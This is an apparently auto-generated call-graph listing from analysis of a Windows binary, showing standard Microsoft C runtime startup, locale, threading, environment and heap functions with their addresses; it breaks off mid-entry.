20441 d9851a std::_Locinfo::_Locinfo_dtor 5 API calls 20442 d98344 20441->20442 20459 d98534 20442->20459 20452 d9835d 20452->20452 20454 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 20453->20454 20455 d98335 20454->20455 20455->20437 20457 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 20456->20457 20458 d9833f 20457->20458 20458->20441 20460 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 20459->20460 20461 d98349 20460->20461 20462 d9854e 20461->20462 20463 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 20462->20463 20464 d9834e 20463->20464 20465 d98568 20464->20465 20466 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 20465->20466 20467 d98353 20466->20467 20468 d98582 20467->20468 20469 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 20468->20469 20470 d98358 20469->20470 20471 d9859c 20470->20471 20472 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 20471->20472 20473 d985b2 20472->20473 20473->20452 20474->20422 20475->20425 17595 d8c190 17596 d8c19c ___scrt_is_nonwritable_in_current_image 17595->17596 17621 d89093 17596->17621 17598 d8c1a3 17599 d8c2fc 17598->17599 17607 d8c1cd ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 17598->17607 17669 d8b64c IsProcessorFeaturePresent 17599->17669 17601 d8c303 17673 d9131e 17601->17673 17606 d8c1ec 17607->17606 17611 d8c26d 17607->17611 17651 d91368 17607->17651 17610 d8c273 17636 db5bf0 17610->17636 17632 d9389d 17611->17632 17622 d8909c 17621->17622 17679 d8b2b8 IsProcessorFeaturePresent 17622->17679 17626 d890ad 17627 d890b1 17626->17627 17689 d8f05f 17626->17689 17627->17598 17630 d890c8 17630->17598 17633 d938ab 17632->17633 17634 d938a6 17632->17634 17633->17610 17761 d939c6 17634->17761 18603 d81790 17636->18603 17639 d81790 123 API calls 17640 db5c32 17639->17640 18606 d81690 17640->18606 17652 d95c3b ___scrt_is_nonwritable_in_current_image 17651->17652 17653 d9137e std::_Locinfo::_Locinfo_dtor 17651->17653 17654 d975d3 __Getctype 39 API calls 17652->17654 17653->17611 17655 d95c4c 17654->17655 17656 d9411a CallUnexpected 39 API calls 17655->17656 17657 d95c76 17656->17657 17670 d8b662 __fread_nolock std::locale::_Setgloballocale 17669->17670 17671 d8b70d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17670->17671 17672 d8b751 std::locale::_Setgloballocale 17671->17672 17672->17601 17674 d91469 std::locale::_Setgloballocale 21 API calls 17673->17674 17675 d8c309 17674->17675 17676 d91334 17675->17676 17677 d91469 std::locale::_Setgloballocale 21 API calls 17676->17677 17678 d8c311 17677->17678 17680 d890a8 17679->17680 17681 d8cb29 17680->17681 17698 d97016 17681->17698 17685 d8cb3a 17686 d8cb45 17685->17686 17712 d97052 17685->17712 17686->17626 17688 d8cb32 17688->17626 17752 d9970e 17689->17752 17692 d8cb48 17693 d8cb5b 17692->17693 17694 d8cb51 17692->17694 17693->17627 17695 d960e9 ___vcrt_uninitialize_ptd 6 API calls 17694->17695 17696 d8cb56 17695->17696 17697 d97052 ___vcrt_uninitialize_locks DeleteCriticalSection 17696->17697 17697->17693 17699 d9701f 17698->17699 17701 d97048 17699->17701 17702 d8cb2e 17699->17702 17716 da1b6a 17699->17716 17703 d97052 ___vcrt_uninitialize_locks DeleteCriticalSection 17701->17703 17702->17688 17704 d960b6 17702->17704 17703->17702 17733 da1a7b 17704->17733 17709 d960e6 17709->17685 17711 d960cb 17711->17685 17713 d9707c 17712->17713 17714 d9705d 17712->17714 17713->17688 17715 d97067 DeleteCriticalSection 17714->17715 17715->17713 17715->17715 17721 da1bfc 17716->17721 17719 da1ba2 InitializeCriticalSectionAndSpinCount 17720 da1b8d 17719->17720 17720->17699 17722 da1b84 17721->17722 17725 da1c1d 17721->17725 17722->17719 17722->17720 17723 da1c85 GetProcAddress 17723->17722 17725->17722 17725->17723 17726 da1c76 17725->17726 17728 da1bb1 LoadLibraryExW 17725->17728 17726->17723 17727 da1c7e FreeLibrary 17726->17727 17727->17723 17729 da1bf8 17728->17729 17730 da1bc8 GetLastError 17728->17730 17729->17725 17730->17729 17731 da1bd3 ___vcrt_InitializeCriticalSectionEx 17730->17731 17731->17729 17732 da1be9 LoadLibraryExW 17731->17732 17732->17725 17734 da1bfc ___vcrt_InitializeCriticalSectionEx 5 API calls 17733->17734 17735 da1a95 17734->17735 17736 da1aae TlsAlloc 17735->17736 17737 d960c0 17735->17737 17737->17711 17738 da1b2c 17737->17738 17739 da1bfc ___vcrt_InitializeCriticalSectionEx 5 API calls 17738->17739 17740 da1b46 17739->17740 17741 da1b61 TlsSetValue 17740->17741 17742 d960d9 17740->17742 17741->17742 17742->17709 17743 d960e9 17742->17743 17744 d960f3 17743->17744 17746 d960f9 17743->17746 17747 da1ab6 17744->17747 17746->17711 17748 da1bfc ___vcrt_InitializeCriticalSectionEx 5 API calls 17747->17748 17749 da1ad0 17748->17749 17750 da1ae8 TlsFree 17749->17750 17751 da1adc 17749->17751 17750->17751 17751->17746 17753 d9971e 17752->17753 17754 d890ba 17752->17754 17753->17754 17756 d98e82 17753->17756 17754->17630 17754->17692 17757 d98e89 17756->17757 17758 d98ecc GetStdHandle 17757->17758 17759 d98f2e 17757->17759 17760 d98edf GetFileType 17757->17760 17758->17757 17759->17753 17760->17757 17762 d939cf 17761->17762 17765 d939e5 17761->17765 17762->17765 17767 d93907 17762->17767 17764 d939dc 17764->17765 17784 d93ad4 17764->17784 17765->17633 17768 d93910 17767->17768 17769 d93913 17767->17769 17768->17764 17793 d98f45 17769->17793 17774 d93930 17826 d939f2 17774->17826 17775 d93924 17820 d97347 17775->17820 17780 d97347 ___free_lconv_mon 14 API calls 17781 d93954 17780->17781 17782 d97347 ___free_lconv_mon 14 API calls 17781->17782 17783 d9395a 17782->17783 17783->17764 17785 d93b45 17784->17785 17790 d93ae3 17784->17790 17785->17765 17786 d97491 WideCharToMultiByte std::_Locinfo::_Locinfo_dtor 17786->17790 17787 d98700 __Getctype 14 API calls 17787->17790 17788 d93b49 17789 d97347 ___free_lconv_mon 14 API calls 17788->17789 17789->17785 17790->17785 17790->17786 17790->17787 17790->17788 17792 d97347 ___free_lconv_mon 14 API calls 17790->17792 18388 d9e602 17790->18388 17792->17790 17794 d93919 17793->17794 17795 d98f4e 17793->17795 17799 d9e52b GetEnvironmentStringsW 17794->17799 17848 d9768e 17795->17848 17800 d9e543 17799->17800 17813 d9391e 17799->17813 17801 d97491 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 17800->17801 17802 d9e560 17801->17802 17803 d9e56a FreeEnvironmentStringsW 17802->17803 17804 d9e575 17802->17804 17803->17813 17805 d97381 __fread_nolock 15 API calls 17804->17805 17806 d9e57c 17805->17806 17807 d9e595 17806->17807 17808 d9e584 17806->17808 17810 d97491 std::_Locinfo::_Locinfo_dtor WideCharToMultiByte 17807->17810 17809 d97347 ___free_lconv_mon 14 API calls 17808->17809 17811 d9e589 FreeEnvironmentStringsW 17809->17811 17812 d9e5a5 17810->17812 17811->17813 17814 d9e5ac 17812->17814 17815 d9e5b4 17812->17815 17813->17774 17813->17775 17816 d97347 ___free_lconv_mon 14 API calls 17814->17816 17817 d97347 ___free_lconv_mon 14 API calls 17815->17817 17818 d9e5b2 FreeEnvironmentStringsW 17816->17818 17817->17818 17818->17813 17821 d97352 HeapFree 17820->17821 17825 d9392a 17820->17825 17822 d97367 GetLastError 17821->17822 17821->17825 17823 d97374 __dosmaperr 17822->17823 17824 d934c5 __dosmaperr 12 API calls 17823->17824 17824->17825 17825->17764 17827 d93a07 17826->17827 17828 d98700 __Getctype 14 API calls 17827->17828 17829 d93a2e 17828->17829 17830 d93a40 17829->17830 17831 d93a36 17829->17831 17834 d93a9d 17830->17834 17836 d98700 __Getctype 14 API calls 17830->17836 17837 d93aac 17830->17837 17842 d93ac7 17830->17842 17844 d97347 ___free_lconv_mon 14 API calls 17830->17844 18369 d96fbc 17830->18369 17832 d97347 ___free_lconv_mon 14 API calls 17831->17832 17833 d93937 17832->17833 17833->17780 17835 d97347 ___free_lconv_mon 14 API calls 17834->17835 17835->17833 17836->17830 18378 d93997 17837->18378 17841 d97347 ___free_lconv_mon 14 API calls 17843 d93ab9 17841->17843 18384 d93bdd IsProcessorFeaturePresent 17842->18384 17846 d97347 ___free_lconv_mon 14 API calls 17843->17846 17844->17830 17846->17833 17847 d93ad3 17849 d97699 17848->17849 17850 d9769f 17848->17850 17895 d97feb 17849->17895 17854 d976a5 17850->17854 17900 d9802a 17850->17900 17855 d976aa 17854->17855 17917 d9411a 17854->17917 17873 d99306 17855->17873 17860 d976d1 17863 d9802a __Getctype 6 API calls 17860->17863 17861 d976e6 17862 d9802a __Getctype 6 API calls 17861->17862 17864 d976f2 17862->17864 17865 d976dd 17863->17865 17866 d97705 17864->17866 17867 d976f6 17864->17867 17870 d97347 ___free_lconv_mon 14 API calls 17865->17870 17912 d978e4 17866->17912 17868 d9802a __Getctype 6 API calls 17867->17868 17868->17865 17870->17854 17872 d97347 ___free_lconv_mon 14 API calls 17872->17855 17874 d99330 17873->17874 18190 d99192 17874->18190 17877 d99349 17877->17794 17880 d99370 18204 d98f8d 17880->18204 17881 d99362 17882 d97347 ___free_lconv_mon 14 API calls 17881->17882 17882->17877 17885 d993a8 17886 d934c5 __dosmaperr 14 API calls 17885->17886 17887 d993ad 17886->17887 17889 d97347 ___free_lconv_mon 14 API calls 17887->17889 17888 d993ef 17891 d99438 17888->17891 18215 d996c1 17888->18215 17889->17877 17890 d993c3 17890->17888 17893 d97347 ___free_lconv_mon 14 API calls 17890->17893 17892 d97347 ___free_lconv_mon 14 API calls 17891->17892 17892->17877 17893->17888 17928 d9842d 17895->17928 17898 d98022 TlsGetValue 17899 d98010 17899->17850 17901 d9842d std::_Locinfo::_Locinfo_dtor 5 API calls 17900->17901 17902 d98046 17901->17902 17903 d976b9 17902->17903 17904 d98064 TlsSetValue 17902->17904 17903->17854 17905 d98700 17903->17905 17910 d9870d __Getctype 17905->17910 17906 d9874d 17946 d934c5 17906->17946 17907 d98738 RtlAllocateHeap 17908 d976c9 17907->17908 17907->17910 17908->17860 17908->17861 17910->17906 17910->17907 17943 d91650 17910->17943 17983 d97a4a 17912->17983 18085 d997c5 17917->18085 17920 d9412a 17922 d94134 IsProcessorFeaturePresent 17920->17922 17923 d94153 17920->17923 17924 d94140 17922->17924 17925 d91334 std::locale::_Setgloballocale 21 API calls 17923->17925 18115 d93c11 17924->18115 17927 d9415d 17925->17927 17929 d9845d 17928->17929 17932 d98007 17928->17932 17929->17932 17935 d98362 17929->17935 17932->17898 17932->17899 17933 d98477 GetProcAddress 17933->17932 17934 d98487 std::_Locinfo::_Locinfo_dtor 17933->17934 17934->17932 17937 d98373 ___vcrt_InitializeCriticalSectionEx 17935->17937 17936 d98409 17936->17932 17936->17933 17937->17936 17938 d98391 LoadLibraryExW 17937->17938 17942 d983df LoadLibraryExW 17937->17942 17939 d983ac GetLastError 17938->17939 17940 d98410 17938->17940 17939->17937 17940->17936 17941 d98422 FreeLibrary 17940->17941 17941->17936 17942->17937 17942->17940 17949 d9168b 17943->17949 17960 d97724 GetLastError 17946->17960 17948 d934ca 17948->17908 17950 d91697 ___scrt_is_nonwritable_in_current_image 17949->17950 17955 d93ea8 EnterCriticalSection 17950->17955 17952 d916a2 std::locale::_Setgloballocale 17956 d916d9 17952->17956 17955->17952 17959 d93ebf LeaveCriticalSection 17956->17959 17958 d9165b 17958->17910 17959->17958 17961 d9773a 17960->17961 17962 d97740 17960->17962 17963 d97feb __Getctype 6 API calls 17961->17963 17964 d9802a __Getctype 6 API calls 17962->17964 17966 d97744 SetLastError 17962->17966 17963->17962 17965 d9775c 17964->17965 17965->17966 17968 d98700 __Getctype 12 API calls 17965->17968 17966->17948 17969 d97771 17968->17969 17970 d97779 17969->17970 17971 d9778a 17969->17971 17972 d9802a __Getctype 6 API calls 17970->17972 17973 d9802a __Getctype 6 API calls 17971->17973 17974 d97787 17972->17974 17975 d97796 17973->17975 17979 d97347 ___free_lconv_mon 12 API calls 17974->17979 17976 d9779a 17975->17976 17977 d977b1 17975->17977 17978 d9802a __Getctype 6 API calls 17976->17978 17980 d978e4 __Getctype 12 API calls 17977->17980 17978->17974 17979->17966 17981 d977bc 17980->17981 17982 d97347 ___free_lconv_mon 12 API calls 17981->17982 17982->17966 17984 d97a56 ___scrt_is_nonwritable_in_current_image 17983->17984 17997 d93ea8 EnterCriticalSection 17984->17997 17986 d97a60 17998 d97a90 17986->17998 17989 d97a9c 17990 d97aa8 ___scrt_is_nonwritable_in_current_image 17989->17990 18002 d93ea8 EnterCriticalSection 17990->18002 17992 d97ab2 18003 d97899 17992->18003 17994 d97aca 18007 d97aea 17994->18007 17997->17986 18001 d93ebf LeaveCriticalSection 17998->18001 18000 d97952 18000->17989 18001->18000 18002->17992 18004 d978a8 __Getctype 18003->18004 18006 d978cf __Getctype 18003->18006 18004->18006 18010 d9ba79 18004->18010 18006->17994 18084 d93ebf LeaveCriticalSection 18007->18084 18009 d97710 18009->17872 18011 d9baf9 18010->18011 18014 d9ba8f 18010->18014 18013 d97347 ___free_lconv_mon 14 API calls 18011->18013 18036 d9bb47 18011->18036 18015 d9bb1b 18013->18015 18014->18011 18016 d9bac2 18014->18016 18018 d97347 ___free_lconv_mon 14 API calls 18014->18018 18017 d97347 ___free_lconv_mon 14 API calls 18015->18017 18025 d97347 ___free_lconv_mon 14 API calls 18016->18025 18037 d9bae4 18016->18037 18019 d9bb2e 18017->18019 18023 d9bab7 18018->18023 18024 d97347 ___free_lconv_mon 14 API calls 18019->18024 18020 d97347 ___free_lconv_mon 14 API calls 18026 d9baee 18020->18026 18021 d9bbb5 18027 d97347 ___free_lconv_mon 14 API calls 18021->18027 18022 d9bb55 18022->18021 18035 d97347 14 API calls ___free_lconv_mon 18022->18035 18038 d9aedb 18023->18038 18029 d9bb3c 18024->18029 18030 d9bad9 18025->18030 18031 d97347 ___free_lconv_mon 14 API calls 18026->18031 18032 d9bbbb 18027->18032 18033 d97347 ___free_lconv_mon 14 API calls 18029->18033 18066 d9b1f6 18030->18066 18031->18011 18032->18006 18033->18036 18035->18022 18078 d9bc13 18036->18078 18037->18020 18039 d9aeec 18038->18039 18040 d9afd5 18038->18040 18041 d9aefd 18039->18041 18042 d97347 ___free_lconv_mon 14 API calls 18039->18042 18040->18016 18043 d9af0f 18041->18043 18044 d97347 ___free_lconv_mon 14 API calls 18041->18044 18042->18041 18044->18043 18067 d9b203 18066->18067 18077 d9b25b 18066->18077 18068 d9b213 18067->18068 18070 d97347 ___free_lconv_mon 14 API calls 18067->18070 18070->18068 18077->18037 18079 d9bc3f 18078->18079 18080 d9bc20 18078->18080 18079->18022 18080->18079 18081 d9b2da __Getctype 14 API calls 18080->18081 18082 d9bc39 18081->18082 18083 d97347 ___free_lconv_mon 14 API calls 18082->18083 18083->18079 18084->18009 18121 d99a48 18085->18121 18088 d997ec 18094 d997f8 ___scrt_is_nonwritable_in_current_image 18088->18094 18089 d97724 __dosmaperr 14 API calls 18098 d99829 std::locale::_Setgloballocale 18089->18098 18090 d99848 18093 d934c5 __dosmaperr 14 API calls 18090->18093 18091 d99832 18091->17920 18092 d9985a std::locale::_Setgloballocale 18095 d99890 std::locale::_Setgloballocale 18092->18095 18135 d93ea8 EnterCriticalSection 18092->18135 18096 d9984d 18093->18096 18094->18089 18094->18090 18094->18092 18094->18098 18101 d999ca 18095->18101 18102 d998cd 18095->18102 18112 d998fb 18095->18112 18132 d93bb0 18096->18132 18098->18090 18098->18091 18098->18092 18103 d999d5 18101->18103 18167 d93ebf LeaveCriticalSection 18101->18167 18102->18112 18136 d975d3 GetLastError 18102->18136 18106 d91334 std::locale::_Setgloballocale 21 API calls 18103->18106 18108 d999dd 18106->18108 18109 d975d3 __Getctype 39 API calls 18113 d99950 18109->18113 18111 d975d3 __Getctype 39 API calls 18111->18112 18163 d99976 18112->18163 18113->18091 18114 d975d3 __Getctype 39 API calls 18113->18114 18114->18091 18116 d93c2d __fread_nolock std::locale::_Setgloballocale 18115->18116 18117 d93c59 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18116->18117 18120 d93d2a std::locale::_Setgloballocale 18117->18120 18119 d93d48 18119->17923 18182 d88eaa 18120->18182 18122 d99a54 ___scrt_is_nonwritable_in_current_image 18121->18122 18127 d93ea8 EnterCriticalSection 18122->18127 18124 d99a62 18128 d99aa4 18124->18128 18127->18124 18131 d93ebf LeaveCriticalSection 18128->18131 18130 d9411f 18130->17920 18130->18088 18131->18130 18168 d93dff 18132->18168 18134 d93bbc 18134->18091 18135->18095 18137 d975e9 18136->18137 18140 d975ef 18136->18140 18138 d97feb __Getctype 6 API calls 18137->18138 18138->18140 18139 d9802a __Getctype 6 API calls 18141 d9760b 18139->18141 18140->18139 18161 d975f3 SetLastError 18140->18161 18142 d98700 __Getctype 14 API calls 18141->18142 18141->18161 18144 d97620 18142->18144 18147 d97639 18144->18147 18148 d97628 18144->18148 18145 d97688 18149 d9411a CallUnexpected 37 API calls 18145->18149 18146 d97683 18146->18111 18151 d9802a __Getctype 6 API calls 18147->18151 18150 d9802a __Getctype 6 API calls 18148->18150 18152 d9768d 18149->18152 18153 d97636 18150->18153 18154 d97645 18151->18154 18158 d97347 ___free_lconv_mon 14 API calls 18153->18158 18155 d97649 18154->18155 18156 d97660 18154->18156 18157 d9802a __Getctype 6 API calls 18155->18157 18159 d978e4 __Getctype 14 API calls 18156->18159 18157->18153 18158->18161 18160 d9766b 18159->18160 18162 d97347 ___free_lconv_mon 14 API calls 18160->18162 18161->18145 18161->18146 18162->18161 18164 d9997a 18163->18164 18166 d99942 18163->18166 18181 d93ebf LeaveCriticalSection 18164->18181 18166->18091 18166->18109 18166->18113 18167->18103 18169 d93e11 _Fputc 18168->18169 18172 d93d59 18169->18172 18171 d93e29 _Fputc 18171->18134 18173 d93d69 18172->18173 18174 d93d70 18172->18174 18175 d8f510 __strnicoll 16 API calls 18173->18175 18176 d93dd6 __strnicoll GetLastError SetLastError 18174->18176 18178 d93d7e 18174->18178 18175->18174 18177 d93da5 18176->18177 18177->18178 18179 d93bdd __Getctype 11 API calls 18177->18179 18178->18171 18180 d93dd5 18179->18180 18181->18166 18183 d88eb2 18182->18183 18184 d88eb3 IsProcessorFeaturePresent 18182->18184 18183->18119 18186 d8b1aa 18184->18186 18189 d8b290 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18186->18189 18188 d8b28d 18188->18119 18189->18188 18223 d8e7da 18190->18223 18193 d991b3 GetOEMCP 18195 d991dc 18193->18195 18194 d991c5 18194->18195 18196 d991ca GetACP 18194->18196 18195->17877 18197 d97381 18195->18197 18196->18195 18198 d973bf 18197->18198 18202 d9738f __Getctype 18197->18202 18199 d934c5 __dosmaperr 14 API calls 18198->18199 18201 d973bd 18199->18201 18200 d973aa RtlAllocateHeap 18200->18201 18200->18202 18201->17880 18201->17881 18202->18198 18202->18200 18203 d91650 codecvt 2 API calls 18202->18203 18203->18202 18205 d99192 41 API calls 18204->18205 18206 d98fad 18205->18206 18208 d98fea IsValidCodePage 18206->18208 18213 d990b2 18206->18213 18214 d99005 __fread_nolock 18206->18214 18207 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18209 d99190 18207->18209 18210 d98ffc 18208->18210 18208->18213 18209->17885 18209->17890 18211 d99025 GetCPInfo 18210->18211 18210->18214 18211->18213 18211->18214 18213->18207 18263 d9951c 18214->18263 18216 d996cd ___scrt_is_nonwritable_in_current_image 18215->18216 18343 d93ea8 EnterCriticalSection 18216->18343 18218 d996d7 18344 d9945b 18218->18344 18224 d8e7f8 18223->18224 18225 d8e7f1 18223->18225 18224->18225 18226 d975d3 __Getctype 39 API calls 18224->18226 18225->18193 18225->18194 18227 d8e819 18226->18227 18231 d97bb6 18227->18231 18232 d97bc9 18231->18232 18234 d8e82f 18231->18234 18232->18234 18239 d9bc44 18232->18239 18235 d97be3 18234->18235 18236 d97c0b 18235->18236 18237 d97bf6 18235->18237 18236->18225 18237->18236 18260 d98f32 18237->18260 18240 d9bc50 ___scrt_is_nonwritable_in_current_image 18239->18240 18241 d975d3 __Getctype 39 API calls 18240->18241 18242 d9bc59 18241->18242 18249 d9bc9f 18242->18249 18252 d93ea8 EnterCriticalSection 18242->18252 18244 d9bc77 18253 d9bcc5 18244->18253 18249->18234 18250 d9411a CallUnexpected 39 API calls 18251 d9bcc4 18250->18251 18252->18244 18254 d9bcd3 __Getctype 18253->18254 18256 d9bc88 18253->18256 18255 d9ba79 __Getctype 14 API calls 18254->18255 18254->18256 18255->18256 18257 d9bca4 18256->18257 18258 d93ebf std::_Lockit::~_Lockit LeaveCriticalSection 18257->18258 18259 d9bc9b 18258->18259 18259->18249 18259->18250 18261 d975d3 __Getctype 39 API calls 18260->18261 18262 d98f37 18261->18262 18262->18236 18264 d99544 GetCPInfo 18263->18264 18265 d9960d 18263->18265 18264->18265 18270 d9955c 18264->18270 18266 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18265->18266 18268 d996bf 18266->18268 18268->18213 18274 d989ec 18270->18274 18275 d8e7da __strnicoll 39 API calls 18274->18275 18276 d98a0c 18275->18276 18294 d973cf 18276->18294 18278 d98ac8 18281 d88eaa __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 18278->18281 18279 d98ac0 18297 d8bc47 18279->18297 18280 d98a39 18280->18278 18280->18279 18284 d97381 __fread_nolock 15 API calls 18280->18284 18285 d98a5e __fread_nolock __alloca_probe_16 18280->18285 18282 d98aeb 18281->18282 18289 d98aed 18282->18289 18284->18285 18285->18279 18286 d973cf __fread_nolock MultiByteToWideChar 18285->18286 18287 d98aa7 18286->18287 18287->18279 18288 d98aae GetStringTypeW 18287->18288 18288->18279 18290 d8e7da __strnicoll 39 API calls 18289->18290 18291 d98b00 18290->18291 18301 d973f9 18294->18301 18298 d8bc51 18297->18298 18299 d8bc62 18297->18299 18298->18299 18303 d94c7a 18298->18303 18299->18278 18302 d973eb MultiByteToWideChar 18301->18302 18302->18280 18304 d97347 ___free_lconv_mon 14 API calls 18303->18304 18305 d94c92 18304->18305 18305->18299 18343->18218 18354 d94966 18344->18354 18346 d9947d 18347 d94966 __fread_nolock 29 API calls 18346->18347 18348 d9949c 18347->18348 18349 d994c3 18348->18349 18350 d97347 ___free_lconv_mon 14 API calls 18348->18350 18351 d99702 18349->18351 18350->18349 18368 d93ebf LeaveCriticalSection 18351->18368 18355 d94977 18354->18355 18358 d94973 _Yarn 18354->18358 18356 d9497e 18355->18356 18360 d94991 __fread_nolock 18355->18360 18357 d934c5 __dosmaperr 14 API calls 18356->18357 18359 d94983 18357->18359 18358->18346 18361 d93bb0 __strnicoll 29 API calls 18359->18361 18360->18358 18362 d949c8 18360->18362 18363 d949bf 18360->18363 18361->18358 18362->18358 18366 d934c5 __dosmaperr 14 API calls 18362->18366 18364 d934c5 __dosmaperr 14 API calls 18363->18364 18365 d949c4 18364->18365 18367 d93bb0 __strnicoll 29 API calls 18365->18367 18366->18365 18367->18358 18370 d96fd8 18369->18370 18371 d96fca 18369->18371 18372 d934c5 __dosmaperr 14 API calls 18370->18372 18371->18370 18376 d96ff0 18371->18376 18373 d96fe0 18372->18373 18375 d93bb0 __strnicoll 29 API calls 18373->18375 18374 d96fea 18374->17830 18375->18374 18376->18374 18377 d934c5 __dosmaperr 14 API calls 18376->18377 18377->18373 18382 d939a4 18378->18382 18383 d939c1 18378->18383 18379 d939bb 18381 d97347 ___free_lconv_mon 14 API calls 18379->18381 18380 d97347 ___free_lconv_mon 14 API calls 18380->18382 18381->18383 18382->18379 18382->18380 18383->17841 18385 d93be9 18384->18385 18386 d93c11 std::locale::_Setgloballocale 8 API calls 18385->18386 18387 d93bfe GetCurrentProcess TerminateProcess 18386->18387 18387->17847 18389 d9e60d 18388->18389 18390 d9e61e 18389->18390 18393 d9e631 ___from_strstr_to_strchr 18389->18393 18391 d934c5 __dosmaperr 14 API calls 18390->18391 18392 d9e623 18391->18392 18392->17790 18394 d9e848 18393->18394 18396 d9e651 18393->18396 18395 d934c5 __dosmaperr 14 API calls 18394->18395 18397 d9e84d 18395->18397 18451 d9e86d 18396->18451 18399 d97347 ___free_lconv_mon 14 API calls 18397->18399 18399->18392 18401 d9e681 18407 d97347 ___free_lconv_mon 14 API calls 18401->18407 18402 d9e697 18402->18401 18406 d98700 __Getctype 14 API calls 18402->18406 18403 d9e673 18409 d9e67c 18403->18409 18410 d9e690 18403->18410 18408 d9e6a5 18406->18408 18407->18392 18412 d97347 ___free_lconv_mon 14 API calls 18408->18412 18414 d934c5 __dosmaperr 14 API calls 18409->18414 18415 d9e86d 39 API calls 18410->18415 18411 d9e70a 18416 d97347 ___free_lconv_mon 14 API calls 18411->18416 18413 d9e6b0 18412->18413 18413->18401 18420 d98700 __Getctype 14 API calls 18413->18420 18429 d9e695 18413->18429 18414->18401 18415->18429 18418 d9e712 18416->18418 18417 d9e755 18417->18401 18419 d9dc22 std::ios_base::_Init 32 API calls 18417->18419 18433 d9e73f 18418->18433 18459 d9dc22 18418->18459 18421 d9e783 18419->18421 18422 d9e6cc 18420->18422 18424 d97347 ___free_lconv_mon 14 API calls 18421->18424 18426 d97347 ___free_lconv_mon 14 API calls 18422->18426 18423 d9e83d 18427 d97347 ___free_lconv_mon 14 API calls 18423->18427 18424->18433 18426->18429 18427->18392 18428 d9e736 18430 d97347 ___free_lconv_mon 14 API calls 18428->18430 18429->18401 18455 d9e887 18429->18455 18430->18433 18431 d98700 __Getctype 14 API calls 18432 d9e7ce 18431->18432 18434 d9e7de 18432->18434 18435 d9e7d6 18432->18435 18433->18401 18433->18423 18433->18431 18437 d96fbc ___std_exception_copy 29 API calls 18434->18437 18436 d97347 ___free_lconv_mon 14 API calls 18435->18436 18436->18401 18438 d9e7ea 18437->18438 18439 d9e7f1 18438->18439 18440 d9e862 18438->18440 18468 da549c 18439->18468 18442 d93bdd __Getctype 11 API calls 18440->18442 18444 d9e86c 18442->18444 18445 d9e818 18447 d934c5 __dosmaperr 14 API calls 18445->18447 18446 d9e837 18448 d97347 ___free_lconv_mon 14 API calls 18446->18448 18449 d9e81d 18447->18449 18448->18423 18450 d97347 ___free_lconv_mon 14 API calls 18449->18450 18450->18401 18452 d9e87a 18451->18452 18453 d9e65c 18451->18453 18483 d9e8dc 18452->18483 18453->18402 18453->18403 18453->18429 18456 d9e6fa 18455->18456 18458 d9e89d 18455->18458 18456->18411 18456->18417 18458->18456 18498 da53ab 18458->18498 18460 d9dc4a 18459->18460 18461 d9dc2f 18459->18461 18462 d9dc59 18460->18462 18532 da4cb4 18460->18532 18461->18460 18463 d9dc3b 18461->18463 18539 da1258 18462->18539 18465 d934c5 __dosmaperr 14 API calls 18463->18465 18467 d9dc40 __fread_nolock 18465->18467 18467->18428 18551 d986c1 18468->18551 18473 da550f 18475 d97347 ___free_lconv_mon 14 API calls 18473->18475 18477 da551b 18473->18477 18474 d986c1 39 API calls 18476 da54ec 18474->18476 18475->18477 18479 d8e8d4 17 API calls 18476->18479 18478 d97347 ___free_lconv_mon 14 API calls 18477->18478 18481 d9e812 18477->18481 18478->18481 18480 da54f9 18479->18480 18480->18473 18482 da5503 SetEnvironmentVariableW 18480->18482 18481->18445 18481->18446 18482->18473 18484 d9e8ea 18483->18484 18485 d9e8ef 18483->18485 18484->18453 18486 d98700 __Getctype 14 API calls 18485->18486 18495 d9e90c 18486->18495 18487 d9e97a 18489 d9411a CallUnexpected 39 API calls 18487->18489 18488 d9e969 18490 d97347 ___free_lconv_mon 14 API calls 18488->18490 18491 d9e97f 18489->18491 18490->18484 18492 d93bdd __Getctype 11 API calls 18491->18492 18493 d9e98b 18492->18493 18494 d98700 __Getctype 14 API calls 18494->18495 18495->18487 18495->18488 18495->18491 18495->18494 18496 d97347 ___free_lconv_mon 14 API calls 18495->18496 18497 d96fbc ___std_exception_copy 29 API calls 18495->18497 18496->18495 18497->18495 18499 da53b9 18498->18499 18500 da53bf 18498->18500 18501 da5c7b 18499->18501 18502 da5c33 18499->18502 18500->18458 18514 da5c91 18501->18514 18504 da5c39 18502->18504 18508 da5c56 18502->18508 18505 d934c5 __dosmaperr 14 API calls 18504->18505 18507 da5c3e 18505->18507 18506 da5c49 18506->18458 18509 d93bb0 __strnicoll 29 API calls 18507->18509 18510 d934c5 __dosmaperr 14 API calls 18508->18510 18513 da5c74 18508->18513 18509->18506 18511 da5c65 18510->18511 18512 d93bb0 __strnicoll 29 API calls 18511->18512 18512->18506 18513->18458 18515 da5cbb 18514->18515 18516 da5ca1 18514->18516 18518 da5cda 18515->18518 18519 da5cc3 18515->18519 18517 d934c5 __dosmaperr 14 API calls 18516->18517 18520 da5ca6 18517->18520 18522 da5cfd 18518->18522 18523 da5ce6 18518->18523 18521 d934c5 __dosmaperr 14 API calls 18519->18521 18524 d93bb0 __strnicoll 29 API calls 18520->18524 18525 da5cc8 18521->18525 18527 d8e7da __strnicoll 39 API calls 18522->18527 18530 da5cb1 18522->18530 18526 d934c5 __dosmaperr 14 API calls 18523->18526 18524->18530 18528 d93bb0 __strnicoll 29 API calls 18525->18528 18529 da5ceb 18526->18529 18527->18530 18528->18530 18531 d93bb0 __strnicoll 29 API calls 18529->18531 18530->18506 18531->18530 18533 